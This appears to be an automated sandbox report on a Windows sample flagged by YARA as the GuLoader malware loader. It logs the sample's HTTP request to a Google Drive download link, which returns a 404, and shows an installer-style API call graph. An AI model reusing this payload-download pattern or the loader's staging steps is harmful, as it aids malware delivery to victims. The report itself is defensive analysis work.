                                                        2024-12-05 16:09:10 UTC  460                OUT        GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:09:11 UTC  1847               IN         HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:09:11 GMT
                                                        Content-Security-Policy: script-src 'nonce-Z6Q_FmnFJaZSLffzj_ChMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6lK0iXxMxjMi6r9ogofdF2Zt-a6T6m6XJsjDQxQ_ve_aSxvSIsOqCEKQILNpwTMKXTMk8
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:09:11 UTC  1652               IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V9lC9gp9eVkSPEGpNf9h2Q">*{margin:0;padding:0}html,code{font:15px/22px arial



                                                        Target ID:0
                                                        Start time:11:00:50
                                                        Start date:05/12/2024
                                                        Path:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\fbXZ4ErQMU.exe"
                                                        Imagebase:0x400000
                                                        File size:901'168 bytes
                                                        MD5 hash:C58B26E27E2D9AA8080E289445E1C8CA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.53292835357.0000000002C0F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:11:02:52
                                                        Start date:05/12/2024
                                                        Path:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\fbXZ4ErQMU.exe"
                                                        Imagebase:0x400000
                                                        File size:901'168 bytes
                                                        MD5 hash:C58B26E27E2D9AA8080E289445E1C8CA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.56492873526.000000000183F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:19.8%
                                                          Dynamic/Decrypted Code Coverage:13.9%
                                                          Signature Coverage:16.4%
                                                          Total number of Nodes:1543
                                                          Total number of Limit Nodes:47
GlobalFree 5268->5270 5269->5259 5271 700516cd GlobalFree 5269->5271 5270->5259 5271->5259 5272 4018fd 5273 401934 5272->5273 5274 402bce 17 API calls 5273->5274 5275 401939 5274->5275 5276 4058bf 67 API calls 5275->5276 5277 401942 5276->5277 5278 401000 5279 401037 BeginPaint GetClientRect 5278->5279 5280 40100c DefWindowProcA 5278->5280 5282 4010f3 5279->5282 5283 401179 5280->5283 5284 401073 CreateBrushIndirect FillRect DeleteObject 5282->5284 5285 4010fc 5282->5285 5284->5282 5286 401102 CreateFontIndirectA 5285->5286 5287 401167 EndPaint 5285->5287 5286->5287 5288 401112 6 API calls 5286->5288 5287->5283 5288->5287 5289 401900 5290 402bce 17 API calls 5289->5290 5291 401907 5290->5291 5292 405813 MessageBoxIndirectA 5291->5292 5293 401910 5292->5293 5294 404b80 GetDlgItem GetDlgItem 5295 404bd6 7 API calls 5294->5295 5299 404dfd 5294->5299 5296 404c72 SendMessageA 5295->5296 5297 404c7e DeleteObject 5295->5297 5296->5297 5298 404c89 5297->5298 5300 404cc0 5298->5300 5301 40618a 17 API calls 5298->5301 5316 404edf 5299->5316 5326 404e6c 5299->5326 5348 404ace SendMessageA 5299->5348 5302 40417b 18 API calls 5300->5302 5306 404ca2 SendMessageA SendMessageA 5301->5306 5307 404cd4 5302->5307 5303 404f8b 5304 404f95 SendMessageA 5303->5304 5305 404f9d 5303->5305 5304->5305 5318 404fb6 5305->5318 5319 404faf ImageList_Destroy 5305->5319 5323 404fc6 5305->5323 5306->5298 5313 40417b 18 API calls 5307->5313 5308 404df0 5311 4041e2 8 API calls 5308->5311 5309 404f38 SendMessageA 5309->5308 5315 404f4d SendMessageA 5309->5315 5310 404ed1 SendMessageA 5310->5316 5317 40518b 5311->5317 5327 404ce5 5313->5327 5314 40513f 5314->5308 5324 405151 ShowWindow GetDlgItem ShowWindow 5314->5324 5321 404f60 5315->5321 5316->5303 5316->5308 5316->5309 5322 404fbf GlobalFree 5318->5322 5318->5323 5319->5318 5320 404dbf GetWindowLongA SetWindowLongA 5325 404dd8 5320->5325 5331 404f71 SendMessageA 5321->5331 5322->5323 5323->5314 5340 405001 5323->5340 5353 404b4e 5323->5353 
5324->5308 5328 404df5 5325->5328 5329 404ddd ShowWindow 5325->5329 5326->5310 5326->5316 5327->5320 5330 404d37 SendMessageA 5327->5330 5332 404dba 5327->5332 5335 404d75 SendMessageA 5327->5335 5336 404d89 SendMessageA 5327->5336 5347 4041b0 SendMessageA 5328->5347 5346 4041b0 SendMessageA 5329->5346 5330->5327 5331->5303 5332->5320 5332->5325 5335->5327 5336->5327 5338 40510b 5339 405115 InvalidateRect 5338->5339 5342 405121 5338->5342 5339->5342 5341 40502f SendMessageA 5340->5341 5345 405045 5340->5345 5341->5345 5342->5314 5362 404a89 5342->5362 5344 4050b9 SendMessageA SendMessageA 5344->5345 5345->5338 5345->5344 5346->5308 5347->5299 5349 404af1 GetMessagePos ScreenToClient SendMessageA 5348->5349 5350 404b2d SendMessageA 5348->5350 5351 404b25 5349->5351 5352 404b2a 5349->5352 5350->5351 5351->5326 5352->5350 5365 4060f7 lstrcpynA 5353->5365 5355 404b61 5366 406055 wsprintfA 5355->5366 5357 404b6b 5358 40140b 2 API calls 5357->5358 5359 404b74 5358->5359 5367 4060f7 lstrcpynA 5359->5367 5361 404b7b 5361->5340 5368 4049c4 5362->5368 5364 404a9e 5364->5314 5365->5355 5366->5357 5367->5361 5369 4049da 5368->5369 5370 40618a 17 API calls 5369->5370 5371 404a3e 5370->5371 5372 40618a 17 API calls 5371->5372 5373 404a49 5372->5373 5374 40618a 17 API calls 5373->5374 5375 404a5f lstrlenA wsprintfA SetDlgItemTextA 5374->5375 5375->5364 5376 401502 5377 40150a 5376->5377 5379 40151d 5376->5379 5378 402bac 17 API calls 5377->5378 5378->5379 5380 402604 5381 402bce 17 API calls 5380->5381 5382 40260b 5381->5382 5385 405c90 GetFileAttributesA CreateFileA 5382->5385 5384 402617 5385->5384 3933 401b87 3934 401b94 3933->3934 3935 401bd8 3933->3935 3938 401c1c 3934->3938 3941 401bab 3934->3941 3936 401c01 GlobalAlloc 3935->3936 3937 401bdc 3935->3937 3940 40618a 17 API calls 3936->3940 3947 402387 3937->3947 3954 4060f7 lstrcpynA 3937->3954 3939 40618a 17 API calls 3938->3939 3938->3947 3942 402381 3939->3942 3940->3938 3952 4060f7 lstrcpynA 3941->3952 3942->3947 3955 
405813 3942->3955 3945 401bee GlobalFree 3945->3947 3946 401bba 3953 4060f7 lstrcpynA 3946->3953 3950 401bc9 3959 4060f7 lstrcpynA 3950->3959 3952->3946 3953->3950 3954->3945 3956 405828 3955->3956 3957 405874 3956->3957 3958 40583c MessageBoxIndirectA 3956->3958 3957->3947 3958->3957 3959->3947 4398 402588 4410 402c0e 4398->4410 4401 402bac 17 API calls 4402 40259b 4401->4402 4403 4025a9 4402->4403 4404 4027bf 4402->4404 4405 4025c2 RegEnumValueA 4403->4405 4406 4025b6 RegEnumKeyA 4403->4406 4407 4025d7 4405->4407 4408 4025de RegCloseKey 4405->4408 4406->4408 4407->4408 4408->4404 4411 402bce 17 API calls 4410->4411 4412 402c25 4411->4412 4413 405f7d RegOpenKeyExA 4412->4413 4414 402592 4413->4414 4414->4401 4415 401389 4417 401390 4415->4417 4416 4013fe 4417->4416 4418 4013cb MulDiv SendMessageA 4417->4418 4418->4417 5386 40460d 5387 404639 5386->5387 5388 40464a 5386->5388 5447 4057f7 GetDlgItemTextA 5387->5447 5390 404656 GetDlgItem 5388->5390 5422 4046b5 5388->5422 5393 40466a 5390->5393 5391 404644 5392 4063d2 5 API calls 5391->5392 5392->5388 5395 40467e SetWindowTextA 5393->5395 5399 405b28 4 API calls 5393->5399 5394 404799 5396 404943 5394->5396 5449 4057f7 GetDlgItemTextA 5394->5449 5400 40417b 18 API calls 5395->5400 5398 4041e2 8 API calls 5396->5398 5403 404957 5398->5403 5404 404674 5399->5404 5405 40469a 5400->5405 5401 40618a 17 API calls 5406 404729 SHBrowseForFolderA 5401->5406 5402 4047c9 5407 405b7d 18 API calls 5402->5407 5404->5395 5413 405a8f 3 API calls 5404->5413 5408 40417b 18 API calls 5405->5408 5406->5394 5409 404741 CoTaskMemFree 5406->5409 5410 4047cf 5407->5410 5411 4046a8 5408->5411 5412 405a8f 3 API calls 5409->5412 5450 4060f7 lstrcpynA 5410->5450 5448 4041b0 SendMessageA 5411->5448 5415 40474e 5412->5415 5413->5395 5418 404785 SetDlgItemTextA 5415->5418 5423 40618a 17 API calls 5415->5423 5417 4046ae 5420 406500 5 API calls 5417->5420 5418->5394 5419 4047e6 5421 406500 5 API calls 5419->5421 5420->5422 5430 4047ed 5421->5430 
5422->5394 5422->5396 5422->5401 5424 40476d lstrcmpiA 5423->5424 5424->5418 5427 40477e lstrcatA 5424->5427 5425 404829 5451 4060f7 lstrcpynA 5425->5451 5427->5418 5428 404830 5429 405b28 4 API calls 5428->5429 5431 404836 GetDiskFreeSpaceA 5429->5431 5430->5425 5434 405ad6 2 API calls 5430->5434 5436 404881 5430->5436 5433 40485a MulDiv 5431->5433 5431->5436 5433->5436 5434->5430 5435 4048f2 5438 404915 5435->5438 5440 40140b 2 API calls 5435->5440 5436->5435 5437 404a89 20 API calls 5436->5437 5439 4048df 5437->5439 5452 40419d EnableWindow 5438->5452 5441 4048f4 SetDlgItemTextA 5439->5441 5442 4048e4 5439->5442 5440->5438 5441->5435 5445 4049c4 20 API calls 5442->5445 5444 404931 5444->5396 5446 404566 SendMessageA 5444->5446 5445->5435 5446->5396 5447->5391 5448->5417 5449->5402 5450->5419 5451->5428 5452->5444 5453 401490 5454 40521e 24 API calls 5453->5454 5455 401497 5454->5455 5456 405192 5457 4051a2 5456->5457 5458 4051b6 5456->5458 5459 4051ff 5457->5459 5460 4051a8 5457->5460 5461 4051be IsWindowVisible 5458->5461 5467 4051d5 5458->5467 5464 405204 CallWindowProcA 5459->5464 5462 4041c7 SendMessageA 5460->5462 5461->5459 5463 4051cb 5461->5463 5465 4051b2 5462->5465 5466 404ace 5 API calls 5463->5466 5464->5465 5466->5467 5467->5464 5468 404b4e 4 API calls 5467->5468 5468->5459 5469 700515d1 5470 700514bb GlobalFree 5469->5470 5471 700515e9 5470->5471 5472 7005162f GlobalFree 5471->5472 5473 70051604 5471->5473 5474 7005161b VirtualFree 5471->5474 5473->5472 5474->5472 4424 402516 4425 402c0e 17 API calls 4424->4425 4426 402520 4425->4426 4427 402bce 17 API calls 4426->4427 4428 402529 4427->4428 4429 402533 RegQueryValueExA 4428->4429 4433 4027bf 4428->4433 4430 402559 RegCloseKey 4429->4430 4431 402553 4429->4431 4430->4433 4431->4430 4435 406055 wsprintfA 4431->4435 4435->4430 4478 40239c 4479 4023a4 4478->4479 4480 4023aa 4478->4480 4481 402bce 17 API calls 4479->4481 4482 402bce 17 API calls 4480->4482 4483 4023ba 4480->4483 4481->4480 4482->4483 
4484 4023c8 4483->4484 4485 402bce 17 API calls 4483->4485 4486 402bce 17 API calls 4484->4486 4485->4484 4487 4023d1 WritePrivateProfileStringA 4486->4487 4488 40209d 4489 40215d 4488->4489 4490 4020af 4488->4490 4492 401423 24 API calls 4489->4492 4491 402bce 17 API calls 4490->4491 4493 4020b6 4491->4493 4498 4022e2 4492->4498 4494 402bce 17 API calls 4493->4494 4495 4020bf 4494->4495 4496 4020d4 LoadLibraryExA 4495->4496 4497 4020c7 GetModuleHandleA 4495->4497 4496->4489 4499 4020e4 GetProcAddress 4496->4499 4497->4496 4497->4499 4500 402130 4499->4500 4501 4020f3 4499->4501 4502 40521e 24 API calls 4500->4502 4503 402112 4501->4503 4504 4020fb 4501->4504 4505 402103 4502->4505 4509 700516db 4503->4509 4551 401423 4504->4551 4505->4498 4507 402151 FreeLibrary 4505->4507 4507->4498 4510 7005170b 4509->4510 4554 70051a98 4510->4554 4512 70051712 4513 70051834 4512->4513 4514 70051723 4512->4514 4515 7005172a 4512->4515 4513->4505 4604 700522af 4514->4604 4588 700522f1 4515->4588 4520 7005174f 4521 70051770 4520->4521 4522 7005178e 4520->4522 4617 700524d8 4521->4617 4526 70051794 4522->4526 4527 700517dc 4522->4527 4524 70051740 4525 70051746 4524->4525 4530 70051751 4524->4530 4525->4520 4598 70052a38 4525->4598 4636 7005156b 4526->4636 4534 700524d8 11 API calls 4527->4534 4528 70051759 4528->4520 4614 70052cc3 4528->4614 4529 70051776 4628 70051559 4529->4628 4608 700526b2 4530->4608 4535 700517cd 4534->4535 4542 70051823 4535->4542 4642 7005249e 4535->4642 4540 70051757 4540->4520 4541 700524d8 11 API calls 4541->4535 4542->4513 4546 7005182d GlobalFree 4542->4546 4546->4513 4548 7005180f 4548->4542 4646 700514e2 wsprintfA 4548->4646 4549 70051808 FreeLibrary 4549->4548 4552 40521e 24 API calls 4551->4552 4553 401431 4552->4553 4553->4505 4649 70051215 GlobalAlloc 4554->4649 4556 70051abf 4650 70051215 GlobalAlloc 4556->4650 4558 70051d00 GlobalFree GlobalFree GlobalFree 4559 70051d1d 4558->4559 4567 70051d67 4558->4567 4561 700520f1 4559->4561 4562 70051d32 
4559->4562 4559->4567 4560 70051aca 4560->4558 4563 70051bbd GlobalAlloc 4560->4563 4564 70052033 4560->4564 4566 70051c08 lstrcpyA 4560->4566 4560->4567 4568 70051c26 GlobalFree 4560->4568 4571 70051c12 lstrcpyA 4560->4571 4575 70051fb7 4560->4575 4580 70051ef9 GlobalFree 4560->4580 4581 70051224 2 API calls 4560->4581 4582 70051c64 4560->4582 4565 70052113 GetModuleHandleA 4561->4565 4561->4567 4562->4567 4653 70051224 4562->4653 4563->4560 4564->4567 4585 7005208c lstrcpyA 4564->4585 4569 70052124 LoadLibraryA 4565->4569 4570 70052139 4565->4570 4566->4571 4567->4512 4568->4560 4569->4567 4569->4570 4657 700515c2 GetProcAddress 4570->4657 4571->4560 4573 7005214b 4574 7005218a 4573->4574 4586 70052174 GetProcAddress 4573->4586 4574->4567 4578 70052197 lstrlenA 4574->4578 4656 70051215 GlobalAlloc 4575->4656 4658 700515c2 GetProcAddress 4578->4658 4580->4560 4581->4560 4582->4560 4651 70051534 GlobalSize GlobalAlloc 4582->4651 4583 700521b0 4583->4567 4585->4567 4586->4574 4587 70051fbf 4587->4512 4593 7005230a 4588->4593 4590 70052446 GlobalFree 4592 70051730 4590->4592 4590->4593 4591 700523b8 GlobalAlloc MultiByteToWideChar 4595 70052405 4591->4595 4596 700523e4 GlobalAlloc CLSIDFromString GlobalFree 4591->4596 4592->4520 4592->4524 4592->4528 4593->4590 4593->4591 4594 70051224 GlobalAlloc lstrcpynA 4593->4594 4593->4595 4660 700512ad 4593->4660 4594->4593 4595->4590 4664 70052646 4595->4664 4596->4590 4600 70052a4a 4598->4600 4599 70052aef VirtualAllocEx 4603 70052b0d 4599->4603 4600->4599 4602 70052bd9 4602->4520 4667 700529e4 4603->4667 4605 700522c4 4604->4605 4606 700522cf GlobalAlloc 4605->4606 4607 70051729 4605->4607 4606->4605 4607->4515 4612 700526e2 4608->4612 4609 70052790 4611 70052796 GlobalSize 4609->4611 4613 700527a0 4609->4613 4610 7005277d GlobalAlloc 4610->4613 4611->4613 4612->4609 4612->4610 4613->4540 4615 70052cce 4614->4615 4616 70052d0e GlobalFree 4615->4616 4671 70051215 GlobalAlloc 4617->4671 4619 700524e4 4620 70052574 
StringFromGUID2 WideCharToMultiByte 4619->4620 4621 70052563 lstrcpynA 4619->4621 4622 70052598 WideCharToMultiByte 4619->4622 4623 700525b9 wsprintfA 4619->4623 4624 700525dd GlobalFree 4619->4624 4625 70052617 GlobalFree 4619->4625 4626 70051266 2 API calls 4619->4626 4672 700512d1 4619->4672 4620->4619 4621->4619 4622->4619 4623->4619 4624->4619 4625->4529 4626->4619 4676 70051215 GlobalAlloc 4628->4676 4630 7005155e 4631 7005156b 2 API calls 4630->4631 4632 70051568 4631->4632 4633 70051266 4632->4633 4634 7005126f GlobalAlloc lstrcpynA 4633->4634 4635 700512a8 GlobalFree 4633->4635 4634->4635 4635->4535 4637 700515a4 lstrcpyA 4636->4637 4638 70051577 wsprintfA 4636->4638 4641 700515bd 4637->4641 4638->4641 4641->4541 4643 700524ac 4642->4643 4645 700517ef 4642->4645 4644 700524c5 GlobalFree 4643->4644 4643->4645 4644->4643 4645->4548 4645->4549 4647 70051266 2 API calls 4646->4647 4648 70051503 4647->4648 4648->4542 4649->4556 4650->4560 4652 70051552 4651->4652 4652->4582 4659 70051215 GlobalAlloc 4653->4659 4655 70051233 lstrcpynA 4655->4567 4656->4587 4657->4573 4658->4583 4659->4655 4661 700512b4 4660->4661 4662 70051224 2 API calls 4661->4662 4663 700512cf 4662->4663 4663->4593 4665 70052654 VirtualAlloc 4664->4665 4666 700526aa 4664->4666 4665->4666 4666->4595 4668 700529ef 4667->4668 4669 700529f4 GetLastError 4668->4669 4670 700529ff 4668->4670 4669->4670 4670->4602 4671->4619 4673 700512f9 4672->4673 4674 700512da 4672->4674 4673->4619 4674->4673 4675 700512e0 lstrcpyA 4674->4675 4675->4673 4676->4630 4677 40159d 4678 402bce 17 API calls 4677->4678 4679 4015a4 SetFileAttributesA 4678->4679 4680 4015b6 4679->4680 5475 70051058 5477 70051074 5475->5477 5476 700510dc 5477->5476 5478 70051091 5477->5478 5479 700514bb GlobalFree 5477->5479 5480 700514bb GlobalFree 5478->5480 5479->5478 5481 700510a1 5480->5481 5482 700510b1 5481->5482 5483 700510a8 GlobalSize 5481->5483 5484 700510b5 GlobalAlloc 5482->5484 5486 700510c6 5482->5486 5483->5482 5485 700514e2 
3 API calls 5484->5485 5485->5486 5487 700510d1 GlobalFree 5486->5487 5487->5476 5488 40149d 5489 402387 5488->5489 5490 4014ab PostQuitMessage 5488->5490 5490->5489 5491 401a1e 5492 402bce 17 API calls 5491->5492 5493 401a27 ExpandEnvironmentStringsA 5492->5493 5494 401a3b 5493->5494 5496 401a4e 5493->5496 5495 401a40 lstrcmpA 5494->5495 5494->5496 5495->5496 4681 40171f 4682 402bce 17 API calls 4681->4682 4683 401726 SearchPathA 4682->4683 4684 401741 4683->4684 5502 7005225a 5503 700522c4 5502->5503 5504 700522cf GlobalAlloc 5503->5504 5505 700522ee 5503->5505 5504->5503 5506 401d1f 5507 402bac 17 API calls 5506->5507 5508 401d26 5507->5508 5509 402bac 17 API calls 5508->5509 5510 401d32 GetDlgItem 5509->5510 5511 402620 5510->5511 4692 402421 4693 402453 4692->4693 4694 402428 4692->4694 4695 402bce 17 API calls 4693->4695 4696 402c0e 17 API calls 4694->4696 4697 40245a 4695->4697 4698 40242f 4696->4698 4704 402c8c 4697->4704 4700 402439 4698->4700 4703 402467 4698->4703 4701 402bce 17 API calls 4700->4701 4702 402440 RegDeleteValueA RegCloseKey 4701->4702 4702->4703 4705 402c9f 4704->4705 4707 402c98 4704->4707 4705->4707 4708 402cd0 4705->4708 4707->4703 4709 405f7d RegOpenKeyExA 4708->4709 4710 402cfe 4709->4710 4711 402db3 4710->4711 4712 402d08 4710->4712 4711->4707 4713 402d0e RegEnumValueA 4712->4713 4722 402d31 4712->4722 4714 402d98 RegCloseKey 4713->4714 4713->4722 4714->4711 4715 402d6d RegEnumKeyA 4716 402d76 RegCloseKey 4715->4716 4715->4722 4717 406500 5 API calls 4716->4717 4718 402d86 4717->4718 4720 402da8 4718->4720 4721 402d8a RegDeleteKeyA 4718->4721 4719 402cd0 6 API calls 4719->4722 4720->4711 4721->4711 4722->4714 4722->4715 4722->4716 4722->4719 4723 4027a1 4724 402bce 17 API calls 4723->4724 4725 4027a8 FindFirstFileA 4724->4725 4726 4027cb 4725->4726 4730 4027bb 4725->4730 4727 4027d2 4726->4727 4731 406055 wsprintfA 4726->4731 4732 4060f7 lstrcpynA 4727->4732 4731->4727 4732->4730 5512 700510e0 5513 7005110e 5512->5513 5514 700511c4 
GlobalFree 5513->5514 5515 700512ad 2 API calls 5513->5515 5516 700511c3 5513->5516 5517 70051266 2 API calls 5513->5517 5518 70051155 GlobalAlloc 5513->5518 5519 700511ea GlobalFree 5513->5519 5520 700511b1 GlobalFree 5513->5520 5521 700512d1 lstrcpyA 5513->5521 5515->5513 5516->5514 5517->5520 5518->5513 5519->5513 5520->5513 5521->5513 5522 402626 5523 40262b 5522->5523 5524 40263f 5522->5524 5525 402bac 17 API calls 5523->5525 5526 402bce 17 API calls 5524->5526 5528 402634 5525->5528 5527 402646 lstrlenA 5526->5527 5527->5528 5529 402668 5528->5529 5530 405d37 WriteFile 5528->5530 5530->5529 5531 70052be3 5532 70052bfb 5531->5532 5533 70051534 2 API calls 5532->5533 5534 70052c16 5533->5534 5535 403ca7 5536 403dfa 5535->5536 5537 403cbf 5535->5537 5539 403e4b 5536->5539 5540 403e0b GetDlgItem GetDlgItem 5536->5540 5537->5536 5538 403ccb 5537->5538 5541 403cd6 SetWindowPos 5538->5541 5542 403ce9 5538->5542 5544 403ea5 5539->5544 5552 401389 2 API calls 5539->5552 5543 40417b 18 API calls 5540->5543 5541->5542 5545 403d06 5542->5545 5546 403cee ShowWindow 5542->5546 5547 403e35 SetClassLongA 5543->5547 5548 4041c7 SendMessageA 5544->5548 5595 403df5 5544->5595 5549 403d28 5545->5549 5550 403d0e DestroyWindow 5545->5550 5546->5545 5551 40140b 2 API calls 5547->5551 5593 403eb7 5548->5593 5553 403d2d SetWindowLongA 5549->5553 5554 403d3e 5549->5554 5603 404104 5550->5603 5551->5539 5555 403e7d 5552->5555 5553->5595 5558 403d4a GetDlgItem 5554->5558 5571 403db5 5554->5571 5555->5544 5559 403e81 SendMessageA 5555->5559 5556 40140b 2 API calls 5556->5593 5557 404106 DestroyWindow EndDialog 5557->5603 5561 403d5d SendMessageA IsWindowEnabled 5558->5561 5564 403d7a 5558->5564 5559->5595 5560 404135 ShowWindow 5560->5595 5561->5564 5561->5595 5562 4041e2 8 API calls 5562->5595 5563 40618a 17 API calls 5563->5593 5565 403d87 5564->5565 5566 403d9a 5564->5566 5567 403dce SendMessageA 5564->5567 5575 403d7f 5564->5575 5565->5567 5565->5575 5569 403da2 5566->5569 5570 
403db7 5566->5570 5567->5571 5568 404154 SendMessageA 5568->5571 5572 40140b 2 API calls 5569->5572 5573 40140b 2 API calls 5570->5573 5571->5562 5572->5575 5573->5575 5574 40417b 18 API calls 5574->5593 5575->5568 5575->5571 5576 40417b 18 API calls 5577 403f32 GetDlgItem 5576->5577 5578 403f47 5577->5578 5579 403f4f ShowWindow EnableWindow 5577->5579 5578->5579 5604 40419d EnableWindow 5579->5604 5581 403f79 EnableWindow 5586 403f8d 5581->5586 5582 403f92 GetSystemMenu EnableMenuItem SendMessageA 5583 403fc2 SendMessageA 5582->5583 5582->5586 5583->5586 5585 403c88 18 API calls 5585->5586 5586->5582 5586->5585 5605 4041b0 SendMessageA 5586->5605 5606 4060f7 lstrcpynA 5586->5606 5588 403ff1 lstrlenA 5589 40618a 17 API calls 5588->5589 5590 404002 SetWindowTextA 5589->5590 5591 401389 2 API calls 5590->5591 5591->5593 5592 404046 DestroyWindow 5594 404060 CreateDialogParamA 5592->5594 5592->5603 5593->5556 5593->5557 5593->5563 5593->5574 5593->5576 5593->5592 5593->5595 5596 404093 5594->5596 5594->5603 5597 40417b 18 API calls 5596->5597 5598 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5597->5598 5599 401389 2 API calls 5598->5599 5600 4040e4 5599->5600 5600->5595 5601 4040ec ShowWindow 5600->5601 5602 4041c7 SendMessageA 5601->5602 5602->5603 5603->5560 5603->5595 5604->5581 5605->5586 5606->5588 4768 40272b 4769 402732 4768->4769 4775 4029aa 4768->4775 4770 402bac 17 API calls 4769->4770 4771 402739 4770->4771 4772 402748 SetFilePointer 4771->4772 4773 402758 4772->4773 4772->4775 4776 406055 wsprintfA 4773->4776 4776->4775 4787 401c2e 4788 402bac 17 API calls 4787->4788 4789 401c35 4788->4789 4790 402bac 17 API calls 4789->4790 4791 401c42 4790->4791 4792 401c57 4791->4792 4793 402bce 17 API calls 4791->4793 4794 402bce 17 API calls 4792->4794 4798 401c67 4792->4798 4793->4792 4794->4798 4795 401c72 4799 402bac 17 API calls 4795->4799 4796 401cbe 4797 402bce 17 API calls 4796->4797 4800 401cc3 4797->4800 4798->4795 4798->4796 4801 401c77 
4799->4801 4803 402bce 17 API calls 4800->4803 4802 402bac 17 API calls 4801->4802 4804 401c83 4802->4804 4805 401ccc FindWindowExA 4803->4805 4806 401c90 SendMessageTimeoutA 4804->4806 4807 401cae SendMessageA 4804->4807 4808 401cea 4805->4808 4806->4808 4807->4808 5607 4042b1 lstrcpynA lstrlenA 4815 401e35 GetDC 4816 402bac 17 API calls 4815->4816 4817 401e47 GetDeviceCaps MulDiv ReleaseDC 4816->4817 4818 402bac 17 API calls 4817->4818 4819 401e78 4818->4819 4820 40618a 17 API calls 4819->4820 4821 401eb5 CreateFontIndirectA 4820->4821 4822 402620 4821->4822 5608 402a35 SendMessageA 5609 402a5a 5608->5609 5610 402a4f InvalidateRect 5608->5610 5610->5609 5611 4014b7 5612 4014bd 5611->5612 5613 401389 2 API calls 5612->5613 5614 4014c5 5613->5614 5615 402dba 5616 402dc9 SetTimer 5615->5616 5618 402de2 5615->5618 5616->5618 5617 402e37 5618->5617 5619 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5618->5619 5619->5617 4869 4015bb 4870 402bce 17 API calls 4869->4870 4871 4015c2 4870->4871 4872 405b28 4 API calls 4871->4872 4886 4015ca 4872->4886 4873 401624 4875 401629 4873->4875 4877 401652 4873->4877 4874 405aba CharNextA 4874->4886 4876 401423 24 API calls 4875->4876 4879 401630 4876->4879 4878 401423 24 API calls 4877->4878 4885 40164a 4878->4885 4888 4060f7 lstrcpynA 4879->4888 4880 405761 2 API calls 4880->4886 4882 40577e 5 API calls 4882->4886 4883 40163b SetCurrentDirectoryA 4883->4885 4884 40160c GetFileAttributesA 4884->4886 4886->4873 4886->4874 4886->4880 4886->4882 4886->4884 4887 4056e4 4 API calls 4886->4887 4887->4886 4888->4883 5620 4016bb 5621 402bce 17 API calls 5620->5621 5622 4016c1 GetFullPathNameA 5621->5622 5623 4016d8 5622->5623 5629 4016f9 5622->5629 5625 40646b 2 API calls 5623->5625 5623->5629 5624 40170d GetShortPathNameA 5626 402a5a 5624->5626 5627 4016e9 5625->5627 5627->5629 5630 4060f7 lstrcpynA 5627->5630 5629->5624 5629->5626 5630->5629

                                                          Control-flow Graph

                                                          [Control-flow graph for the function at 403348 (nodes marked Executed / Not Executed); graph not reproduced.]
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                          • GetVersion.KERNEL32 ref: 00403373
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
